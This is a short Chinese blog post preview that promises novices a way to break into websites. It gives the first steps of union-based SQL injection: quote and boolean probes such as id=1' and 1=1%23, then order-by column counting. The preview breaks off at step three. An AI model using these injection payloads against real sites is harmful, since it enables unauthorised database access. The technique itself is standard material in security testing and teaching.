震惊!sql注入 的格式居然被他爆了出来,按照这个格式,新手入侵网站变成可能?!(作者自用格式)
联合查询
判断是否存在注入
id=1’ 异常
id=1’ and 1=1%23 正确
id=1’ and 1=2%23 错误
说明存在单引号字符型SQL注入
都错误的话,可以尝试数字型,双引号,括号型
2.求列数
id = 1 order by 4%23 正常
Id = 1 order by 5%23异常
说明有4列
格式 id = 1 order by 数字%23
3.求...
原创
2018-07-26 20:07:43 ·
832 阅读 ·
0 评论